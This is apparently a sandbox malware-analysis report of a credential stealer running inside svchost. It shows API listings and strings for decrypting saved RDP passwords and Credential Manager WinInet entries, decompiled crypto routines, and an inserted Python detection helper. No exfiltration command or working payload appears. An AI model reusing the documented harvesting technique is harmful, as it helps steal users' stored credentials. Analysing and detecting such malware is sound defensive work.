                                                                                                                                        0x10009e8d
                                                                                                                                        0x10009e90
                                                                                                                                        0x10009e92
                                                                                                                                        0x10009e93
                                                                                                                                        0x10009e93
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e93
                                                                                                                                        0x10009e7d
                                                                                                                                        0x10009e80
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e82
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e82
                                                                                                                                        0x10009e6c
                                                                                                                                        0x10009e6e
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e70
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e70
                                                                                                                                        0x10009e98
                                                                                                                                        0x10009e99
                                                                                                                                        0x10009e9c
                                                                                                                                        0x10009e9f
                                                                                                                                        0x10009ea2
                                                                                                                                        0x10009ebb
                                                                                                                                        0x10009ec1
                                                                                                                                        0x10009ec3
                                                                                                                                        0x10009ec5
                                                                                                                                        0x10009ec9
                                                                                                                                        0x10009eda
                                                                                                                                        0x10009ee2
                                                                                                                                        0x10009ee2
                                                                                                                                        0x10009ec9
                                                                                                                                        0x10009ec3
                                                                                                                                        0x00000000
                                                                                                                                        0x10009e4c
                                                                                                                                        0x10009f0b
                                                                                                                                        0x10009dc4
                                                                                                                                        0x10009dc4
                                                                                                                                        0x10009dc4

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 10009E55
                                                                                                                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 10009EBB
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 10009EE2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataFreeLocalUnprotectlstrlen
                                                                                                                                        • String ID: full address:s:$password 51:b:$username:s:
                                                                                                                                        • API String ID: 2920030623-2945746679
                                                                                                                                        • Opcode ID: 53c5e35d188f79bff04283a5370ca8336e1b183e5a0bf9ca9dbd06af5e2ed465
                                                                                                                                        • Instruction ID: e9946a190e3f1b886fcfc70145eac174cada5b371718b51a596e5b63238612e6
                                                                                                                                        • Opcode Fuzzy Hash: 53c5e35d188f79bff04283a5370ca8336e1b183e5a0bf9ca9dbd06af5e2ed465
                                                                                                                                        • Instruction Fuzzy Hash: D4413976D0014AAAFF11DBE0CC46BEEBBB5EB443D0F100026F641B50A9DB755E92DB61
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        APIs
                                                                                                                                        • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 10008152
                                                                                                                                        • lstrlenW.KERNEL32(10010429,?,?,00000000), ref: 10008190
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 100081C0
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 100081F2
                                                                                                                                        • CredFree.ADVAPI32(00000000), ref: 10008210
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
                                                                                                                                        • String ID: Microsoft_WinInet_*
                                                                                                                                        • API String ID: 3891647360-439986189
                                                                                                                                        • Opcode ID: 51c270d82e88255994f1764cbe3a61f2b5843da7e40cc33b2207a9cd69d01b0a
                                                                                                                                        • Instruction ID: df921cf5f0bab22aaa9602da5f097936af93cbe1de05f5093905011ad881e64c
                                                                                                                                        • Opcode Fuzzy Hash: 51c270d82e88255994f1764cbe3a61f2b5843da7e40cc33b2207a9cd69d01b0a
                                                                                                                                        • Instruction Fuzzy Hash: 3D314E72900119EBFF11CF80CC45BEEB7F8FB14380F104029E681B61A9D7B89A85DBA1
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 3.75%
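
The two routines above are the sample's credential harvesters: the first references the .rdp file field names "full address:s:", "username:s:" and "password 51:b:" and calls CryptUnprotectData, the second enumerates Credential Manager entries matching "Microsoft_WinInet_*" and again calls CryptUnprotectData. The following triage helper is an added example, not code from the report or from the sample: it parses Joe Sandbox-style "APIs" lines and the "String ID" list, flags both patterns, and shows why CryptUnprotectData is needed in the RDP case, since the "password 51:b:" field of an .rdp file is a hex-encoded DPAPI blob (recognisable by its version 1 header and provider GUID {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}). REPORT_APIS and REPORT_STRING_ID are copied from the two listings above; the .rdp file content is constructed and its blob carries only the DPAPI header, no real ciphertext; all function and variable names are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Matches one report line such as
#   • CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 10008152
API_LINE = re.compile(
    r"(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# First 20 bytes of every DPAPI blob: dwVersion = 1, then the provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian field order. The
# "password 51:b:" value of an .rdp file is this blob, hex-encoded, and it can
# only be decrypted by CryptUnprotectData in the owning user's context, which
# the stealer has because it runs as that user.
DPAPI_BLOB_HEADER = bytes.fromhex("01000000D08C9DDF0115D1118C7A00C04FC297EB")

# Constructed inputs: the two API lists from the report functions above, the
# String ID of the first function, and a synthetic .rdp file (header-only blob).
REPORT_APIS = """
• lstrlenA.KERNEL32(00000000), ref: 10009E55
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 10009EBB
• LocalFree.KERNEL32(00000000), ref: 10009EE2
• CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 10008152
• lstrlenW.KERNEL32(10010429,?,?,00000000), ref: 10008190
• CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 100081C0
• LocalFree.KERNEL32(00000000), ref: 100081F2
• CredFree.ADVAPI32(00000000), ref: 10008210
"""
REPORT_STRING_ID = "full address:s:$password 51:b:$username:s:"
SAMPLE_RDP = """\
full address:s:rdp.example.internal
username:s:CORP\\alice
password 51:b:01000000D08C9DDF0115D1118C7A00C04FC297EB0000
"""


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int  # instruction address of the call site


def parse_api_lines(text):
    """Parse the report's 'Name.MODULE(args), ref: ADDR' lines, in report order."""
    calls = []
    for m in API_LINE.finditer(text):
        raw = m.group("args").strip()
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def parse_rdp(text):
    """Parse 'name:type:value' lines of an .rdp file into {name: (type, value)}."""
    fields = {}
    for line in text.splitlines():
        parts = line.strip().split(":", 2)
        if len(parts) == 3:
            name, typ, value = parts
            fields[name] = (typ, value)
    return fields


def rdp_password_is_dpapi(fields):
    """True if the 'password 51' binary field starts with the DPAPI blob header."""
    typ, value = fields.get("password 51", (None, ""))
    if typ != "b":
        return False
    try:
        blob = bytes.fromhex(value)
    except ValueError:
        return False
    return blob.startswith(DPAPI_BLOB_HEADER)


def classify(calls, string_ids):
    """Map API/string evidence to the credential-theft behaviours it implies."""
    findings = set()
    unprotect_refs = [c.ref for c in calls if c.api == "CryptUnprotectData"]
    for c in calls:
        # Credential Manager harvest: CredEnumerateA with the WinInet filter, and a
        # later CryptUnprotectData to decrypt the CredentialBlob of each entry.
        if (c.api == "CredEnumerateA" and c.args
                and c.args[0].startswith("Microsoft_WinInet_")
                and any(r > c.ref for r in unprotect_refs)):
            findings.add("credman_wininet_harvest")
    # RDP harvest: .rdp field names next to CryptUnprotectData means the DPAPI
    # password blob of saved connections is decrypted.
    rdp_fields = {"full address:s:", "username:s:", "password 51:b:"}
    if unprotect_refs and rdp_fields <= set(string_ids):
        findings.add("rdp_file_password_harvest")
    return findings


if __name__ == "__main__":
    print(sorted(classify(parse_api_lines(REPORT_APIS), REPORT_STRING_ID.split("$"))))
    print(rdp_password_is_dpapi(parse_rdp(SAMPLE_RDP)))
```

Run against the report text, the helper flags both behaviours; run against a single CredFree line it flags nothing, which is the point of pairing the enumeration call with the DPAPI decrypt rather than alerting on either API alone.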

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442FC8() {
                                                                                                                                        				intOrPtr _t11;
                                                                                                                                        				void* _t17;
                                                                                                                                        
                                                                                                                                        				if( *(_t17 - 4) != 0) {
                                                                                                                                        					__imp__CryptDestroyHash( *(_t17 - 4));
                                                                                                                                        					 *(_t17 - 4) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 0xc) != 0) {
                                                                                                                                        					CryptDestroyKey( *(_t17 - 0xc));
                                                                                                                                        					 *(_t17 - 0xc) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 8) != 0) {
                                                                                                                                        					CryptReleaseContext( *(_t17 - 8), 0);
                                                                                                                                        					 *(_t17 - 8) = 0;
                                                                                                                                        				}
                                                                                                                                        				_t11 =  *((intOrPtr*)(_t17 - 0x10));
                                                                                                                                        				return _t11;
                                                                                                                                        			}

                                                                                                                                        0x02442ff4
                                                                                                                                        0x02442ffa
                                                                                                                                        0x02443000
                                                                                                                                        0x02443000
                                                                                                                                        0x0244300b
                                                                                                                                        0x02443011
                                                                                                                                        0x02443017
                                                                                                                                        0x02443017
                                                                                                                                        0x02443022
                                                                                                                                        0x0244302a
                                                                                                                                        0x02443030
                                                                                                                                        0x02443030
                                                                                                                                        0x02443037
                                                                                                                                        0x02443041

                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: aaa09cd50603d49b610475c4f132bddee2d4a5502ed520d206129c5e0a6e190e
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: aaa09cd50603d49b610475c4f132bddee2d4a5502ed520d206129c5e0a6e190e
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442F60() {
                                                                                                                                        				intOrPtr _t11;
                                                                                                                                        				void* _t17;
                                                                                                                                        
                                                                                                                                        				if( *(_t17 - 4) != 0) {
                                                                                                                                        					__imp__CryptDestroyHash( *(_t17 - 4));
                                                                                                                                        					 *(_t17 - 4) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 0xc) != 0) {
                                                                                                                                        					CryptDestroyKey( *(_t17 - 0xc));
                                                                                                                                        					 *(_t17 - 0xc) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 8) != 0) {
                                                                                                                                        					CryptReleaseContext( *(_t17 - 8), 0);
                                                                                                                                        					 *(_t17 - 8) = 0;
                                                                                                                                        				}
                                                                                                                                        				_t11 =  *((intOrPtr*)(_t17 - 0x10));
                                                                                                                                        				return _t11;
                                                                                                                                        			}






                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: 652cd781ef76f60e84d3d7b0831cd49a09c83339d69904f1084787659a1b8662
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: 652cd781ef76f60e84d3d7b0831cd49a09c83339d69904f1084787659a1b8662
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442FE8() {
                                                                                                                                        				intOrPtr _t11;
                                                                                                                                        				void* _t17;
                                                                                                                                        
                                                                                                                                        				if( *(_t17 - 4) != 0) {
                                                                                                                                        					__imp__CryptDestroyHash( *(_t17 - 4));
                                                                                                                                        					 *(_t17 - 4) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 0xc) != 0) {
                                                                                                                                        					CryptDestroyKey( *(_t17 - 0xc));
                                                                                                                                        					 *(_t17 - 0xc) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 8) != 0) {
                                                                                                                                        					CryptReleaseContext( *(_t17 - 8), 0);
                                                                                                                                        					 *(_t17 - 8) = 0;
                                                                                                                                        				}
                                                                                                                                        				_t11 =  *((intOrPtr*)(_t17 - 0x10));
                                                                                                                                        				return _t11;
                                                                                                                                        			}






                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: b16c4224f519aef1f2968b31a2511ed3a3f190798967613916683fa9a57965a6
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: b16c4224f519aef1f2968b31a2511ed3a3f190798967613916683fa9a57965a6
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                        			E02442F9E() {
                                                                                                                                        				intOrPtr _t11;
                                                                                                                                        				void* _t17;
                                                                                                                                        
                                                                                                                                        				if( *(_t17 - 4) != 0) {
                                                                                                                                        					__imp__CryptDestroyHash( *(_t17 - 4));
                                                                                                                                        					 *(_t17 - 4) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 0xc) != 0) {
                                                                                                                                        					CryptDestroyKey( *(_t17 - 0xc));
                                                                                                                                        					 *(_t17 - 0xc) = 0;
                                                                                                                                        				}
                                                                                                                                        				if( *(_t17 - 8) != 0) {
                                                                                                                                        					CryptReleaseContext( *(_t17 - 8), 0);
                                                                                                                                        					 *(_t17 - 8) = 0;
                                                                                                                                        				}
                                                                                                                                        				_t11 =  *((intOrPtr*)(_t17 - 0x10));
                                                                                                                                        				return _t11;
                                                                                                                                        			}






                                                                                                                                        APIs
                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 02442FFA
                                                                                                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 02443011
                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0244302A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Crypt$Destroy$ContextHashRelease
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3577760690-0
                                                                                                                                        • Opcode ID: b230cb32c14183c851f01f381da461bc28c56bd83e9851dcbd3629af220de3ad
                                                                                                                                        • Instruction ID: 97e64363e6bc6028292b2b446c843f68f3139003882a08303f59d809de20d535
                                                                                                                                        • Opcode Fuzzy Hash: b230cb32c14183c851f01f381da461bc28c56bd83e9851dcbd3629af220de3ad
                                                                                                                                        • Instruction Fuzzy Hash: 55F0A275D40208EBEF24CF94D44C7ADBBB4BB04709F1085CAE51567384CB7A6694DF50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 2.20%

                                                                                                                                        APIs
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 10004420
                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 10004454
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1561624719-0
                                                                                                                                        • Opcode ID: 93f21967da1c6853c22785ba6aada72162c4e91a03ed299abcbcffd8d68c65c9
                                                                                                                                        • Instruction ID: 6b6b841ac1df837fb916598550c31d23815af00400e63fb35a7ce2afb2bde07a
                                                                                                                                        • Opcode Fuzzy Hash: 93f21967da1c6853c22785ba6aada72162c4e91a03ed299abcbcffd8d68c65c9
                                                                                                                                        • Instruction Fuzzy Hash: F9113A75A00208EBEF01CF94CC85BDEBBB4FB04390F118065F925662E5CB74AA44DB54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        C-Code - Quality: 49%
                                                                                                                                        			E1000301A(void* __eax, intOrPtr* _a4, intOrPtr* _a8, char _a12) {
                                                                                                                                        				char _v8;
                                                                                                                                        				signed int _t211;
                                                                                                                                        				signed int _t214;
                                                                                                                                        				signed int _t217;
                                                                                                                                        				signed int _t220;
                                                                                                                                        				signed int _t223;
                                                                                                                                        				signed int _t226;
                                                                                                                                        				signed int _t229;
                                                                                                                                        				signed int _t232;
                                                                                                                                        				signed int _t235;
                                                                                                                                        				signed int _t238;
                                                                                                                                        				signed int _t241;
                                                                                                                                        				signed int _t244;
                                                                                                                                        				signed int _t247;
                                                                                                                                        				signed int _t250;
                                                                                                                                        				signed int _t253;
                                                                                                                                        				signed int _t256;
                                                                                                                                        				signed int _t257;
                                                                                                                                        				signed int _t260;
                                                                                                                                        				signed int _t263;
                                                                                                                                        				signed int _t266;
                                                                                                                                        				signed int _t269;
    signed int _t272;
    signed int _t275;
    signed int _t278;
    signed int _t281;
    signed int _t284;
    signed int _t287;
    signed int _t290;
    signed int _t293;
    signed int _t296;
    signed int _t299;
    signed int _t302;
    signed int _t306;
    signed int _t309;
    signed int _t312;
    signed int _t315;
    signed int _t318;
    signed int _t321;
    signed int _t324;
    signed int _t327;
    signed int _t330;
    signed int _t333;
    signed int _t336;
    signed int _t339;
    signed int _t342;
    signed int _t345;
    signed int _t348;
    signed int _t351;
    signed int _t354;
    signed int _t355;
    signed int _t358;
    signed int _t361;
    signed int _t364;
    signed int _t367;
    signed int _t370;
    signed int _t373;
    signed int _t376;
    signed int _t379;
    signed int _t382;
    signed int _t385;
    signed int _t388;
    signed int _t391;
    signed int _t394;
    signed int _t397;
    signed int _t400;
    signed int _t403;
    intOrPtr* _t404;
    intOrPtr* _t645;

    // MD5 block transform (RFC 1321), fully unrolled. _a4 points at the 16-byte
    // state {A,B,C,D} (offsets 0, 4, 8, 0xc), _a8 at the 64-byte message block
    // (offsets 0x0..0x3c = M[0..15]); the use of _a12 is not in this excerpt.
    // The per-step additive constants are the sin-derived table T[i]; the
    // decompiler renders them as signed 32-bit immediates, so 0xd76aa478 appears
    // as "- 0x28955b88", 0xe8c7b756 as "- 0x173848aa", and so on.
    _t645 = _a8;
    _t404 = _a4;
    _v8 = _a12;
    do {
        // Round 1, steps 0-15: F(b,c,d) = d ^ (b & (c ^ d)), rotations 7/12/17/22,
        // message words M[0..15] in order.
        _t257 =  *(_t404 + 4);
        _t306 =  *(_t404 + 8);
        _t355 =  *(_t404 + 0xc);
        asm("rol eax, 0x7");
        _t211 = ((_t306 ^ _t355) & _t257 ^ _t355) +  *_t404 - 0x28955b88 +  *_t645 + _t257;
        asm("rol edx, 0xc");
        _t358 = ((_t257 ^ _t306) & _t211 ^ _t306) + _t355 - 0x173848aa +  *((intOrPtr*)(_t645 + 4)) + _t211;
        asm("rol ecx, 0x11");
        _t309 = ((_t211 ^ _t257) & _t358 ^ _t257) + _t306 + 0x242070db +  *((intOrPtr*)(_t645 + 8)) + _t358;
        asm("rol ebx, 0x16");
        _t260 = ((_t358 ^ _t211) & _t309 ^ _t211) + _t257 - 0x3e423112 +  *((intOrPtr*)(_t645 + 0xc)) + _t309;
        asm("rol eax, 0x7");
        _t214 = ((_t309 ^ _t358) & _t260 ^ _t358) + _t211 - 0xa83f051 +  *((intOrPtr*)(_t645 + 0x10)) + _t260;
        asm("rol edx, 0xc");
        _t361 = ((_t260 ^ _t309) & _t214 ^ _t309) + _t358 + 0x4787c62a +  *((intOrPtr*)(_t645 + 0x14)) + _t214;
        asm("rol ecx, 0x11");
        _t312 = ((_t214 ^ _t260) & _t361 ^ _t260) + _t309 - 0x57cfb9ed +  *((intOrPtr*)(_t645 + 0x18)) + _t361;
        asm("rol ebx, 0x16");
        _t263 = ((_t361 ^ _t214) & _t312 ^ _t214) + _t260 - 0x2b96aff +  *((intOrPtr*)(_t645 + 0x1c)) + _t312;
        asm("rol eax, 0x7");
        _t217 = ((_t312 ^ _t361) & _t263 ^ _t361) + _t214 + 0x698098d8 +  *((intOrPtr*)(_t645 + 0x20)) + _t263;
        asm("rol edx, 0xc");
        _t364 = ((_t263 ^ _t312) & _t217 ^ _t312) + _t361 - 0x74bb0851 +  *((intOrPtr*)(_t645 + 0x24)) + _t217;
        asm("rol ecx, 0x11");
        _t315 = ((_t217 ^ _t263) & _t364 ^ _t263) + _t312 - 0xa44f +  *((intOrPtr*)(_t645 + 0x28)) + _t364;
        asm("rol ebx, 0x16");
        _t266 = ((_t364 ^ _t217) & _t315 ^ _t217) + _t263 - 0x76a32842 +  *((intOrPtr*)(_t645 + 0x2c)) + _t315;
        asm("rol eax, 0x7");
        _t220 = ((_t315 ^ _t364) & _t266 ^ _t364) + _t217 + 0x6b901122 +  *((intOrPtr*)(_t645 + 0x30)) + _t266;
        asm("rol edx, 0xc");
        _t367 = ((_t266 ^ _t315) & _t220 ^ _t315) + _t364 - 0x2678e6d +  *((intOrPtr*)(_t645 + 0x34)) + _t220;
        asm("rol ecx, 0x11");
        _t318 = ((_t220 ^ _t266) & _t367 ^ _t266) + _t315 - 0x5986bc72 +  *((intOrPtr*)(_t645 + 0x38)) + _t367;
        asm("rol ebx, 0x16");
        _t269 = ((_t367 ^ _t220) & _t318 ^ _t220) + _t266 + 0x49b40821 +  *((intOrPtr*)(_t645 + 0x3c)) + _t318;
        // Round 2, steps 16-31: G(b,c,d) = c ^ (d & (b ^ c)), rotations 5/9/14/20,
        // message words M[(5i + 1) mod 16]: 1, 6, 11, 0, 5, 10, 15, 4, ...
        asm("rol eax, 0x5");
        _t223 = ((_t318 ^ _t269) & _t367 ^ _t318) + _t220 - 0x9e1da9e +  *((intOrPtr*)(_t645 + 4)) + _t269;
        asm("rol edx, 0x9");
        _t370 = ((_t269 ^ _t223) & _t318 ^ _t269) + _t367 - 0x3fbf4cc0 +  *((intOrPtr*)(_t645 + 0x18)) + _t223;
        asm("rol ecx, 0xe");
        _t321 = ((_t223 ^ _t370) & _t269 ^ _t223) + _t318 + 0x265e5a51 +  *((intOrPtr*)(_t645 + 0x2c)) + _t370;
        asm("rol ebx, 0x14");
        _t272 = ((_t370 ^ _t321) & _t223 ^ _t370) + _t269 - 0x16493856 +  *_t645 + _t321;
        asm("rol eax, 0x5");
        _t226 = ((_t321 ^ _t272) & _t370 ^ _t321) + _t223 - 0x29d0efa3 +  *((intOrPtr*)(_t645 + 0x14)) + _t272;
        asm("rol edx, 0x9");
        _t373 = ((_t272 ^ _t226) & _t321 ^ _t272) + _t370 + 0x2441453 +  *((intOrPtr*)(_t645 + 0x28)) + _t226;
        asm("rol ecx, 0xe");
        _t324 = ((_t226 ^ _t373) & _t272 ^ _t226) + _t321 - 0x275e197f +  *((intOrPtr*)(_t645 + 0x3c)) + _t373;
        asm("rol ebx, 0x14");
        _t275 = ((_t373 ^ _t324) & _t226 ^ _t373) + _t272 - 0x182c0438 +  *((intOrPtr*)(_t645 + 0x10)) + _t324;
        asm("rol eax, 0x5");
        _t229 = ((_t324 ^ _t275) & _t373 ^ _t324) + _t226 + 0x21e1cde6 +  *((intOrPtr*)(_t645 + 0x24)) + _t275;
        asm("rol edx, 0x9");
        _t376 = ((_t275 ^ _t229) & _t324 ^ _t275) + _t373 - 0x3cc8f82a +  *((intOrPtr*)(_t645 + 0x38)) + _t229;
        asm("rol ecx, 0xe");
        _t327 = ((_t229 ^ _t376) & _t275 ^ _t229) + _t324 - 0xb2af279 +  *((intOrPtr*)(_t645 + 0xc)) + _t376;
        asm("rol ebx, 0x14");
        _t278 = ((_t376 ^ _t327) & _t229 ^ _t376) + _t275 + 0x455a14ed +  *((intOrPtr*)(_t645 + 0x20)) + _t327;
        asm("rol eax, 0x5");
        _t232 = ((_t327 ^ _t278) & _t376 ^ _t327) + _t229 - 0x561c16fb +  *((intOrPtr*)(_t645 + 0x34)) + _t278;
        asm("rol edx, 0x9");
        _t379 = ((_t278 ^ _t232) & _t327 ^ _t278) + _t376 - 0x3105c08 +  *((intOrPtr*)(_t645 + 8)) + _t232;
        asm("rol ecx, 0xe");
        _t330 = ((_t232 ^ _t379) & _t278 ^ _t232) + _t327 + 0x676f02d9 +  *((intOrPtr*)(_t645 + 0x1c)) + _t379;
        asm("rol ebx, 0x14");
        _t281 = ((_t379 ^ _t330) & _t232 ^ _t379) + _t278 - 0x72d5b376 +  *((intOrPtr*)(_t645 + 0x30)) + _t330;
        // Round 3, steps 32-47: H(b,c,d) = b ^ c ^ d, rotations 4/11/16/23,
        // message words M[(3i + 5) mod 16]: 5, 8, 11, 14, 1, 4, 7, 10, ...
        asm("rol eax, 0x4");
        _t235 = (_t330 ^ _t379 ^ _t281) + _t232 - 0x5c6be +  *((intOrPtr*)(_t645 + 0x14)) + _t281;
        asm("rol edx, 0xb");
        _t382 = (_t281 ^ _t330 ^ _t235) + _t379 - 0x788e097f +  *((intOrPtr*)(_t645 + 0x20)) + _t235;
        asm("rol ecx, 0x10");
        _t333 = (_t235 ^ _t281 ^ _t382) + _t330 + 0x6d9d6122 +  *((intOrPtr*)(_t645 + 0x2c)) + _t382;
        asm("rol ebx, 0x17");
        _t284 = (_t382 ^ _t235 ^ _t333) + _t281 - 0x21ac7f4 +  *((intOrPtr*)(_t645 + 0x38)) + _t333;
        asm("rol eax, 0x4");
        _t238 = (_t333 ^ _t382 ^ _t284) + _t235 - 0x5b4115bc +  *((intOrPtr*)(_t645 + 4)) + _t284;
        asm("rol edx, 0xb");
        _t385 = (_t284 ^ _t333 ^ _t238) + _t382 + 0x4bdecfa9 +  *((intOrPtr*)(_t645 + 0x10)) + _t238;
        asm("rol ecx, 0x10");
        _t336 = (_t238 ^ _t284 ^ _t385) + _t333 - 0x944b4a0 +  *((intOrPtr*)(_t645 + 0x1c)) + _t385;
        asm("rol ebx, 0x17");
        _t287 = (_t385 ^ _t238 ^ _t336) + _t284 - 0x41404390 +  *((intOrPtr*)(_t645 + 0x28)) + _t336;
        asm("rol eax, 0x4");
        _t241 = (_t336 ^ _t385 ^ _t287) + _t238 + 0x289b7ec6 +  *((intOrPtr*)(_t645 + 0x34)) + _t287;
        asm("rol edx, 0xb");
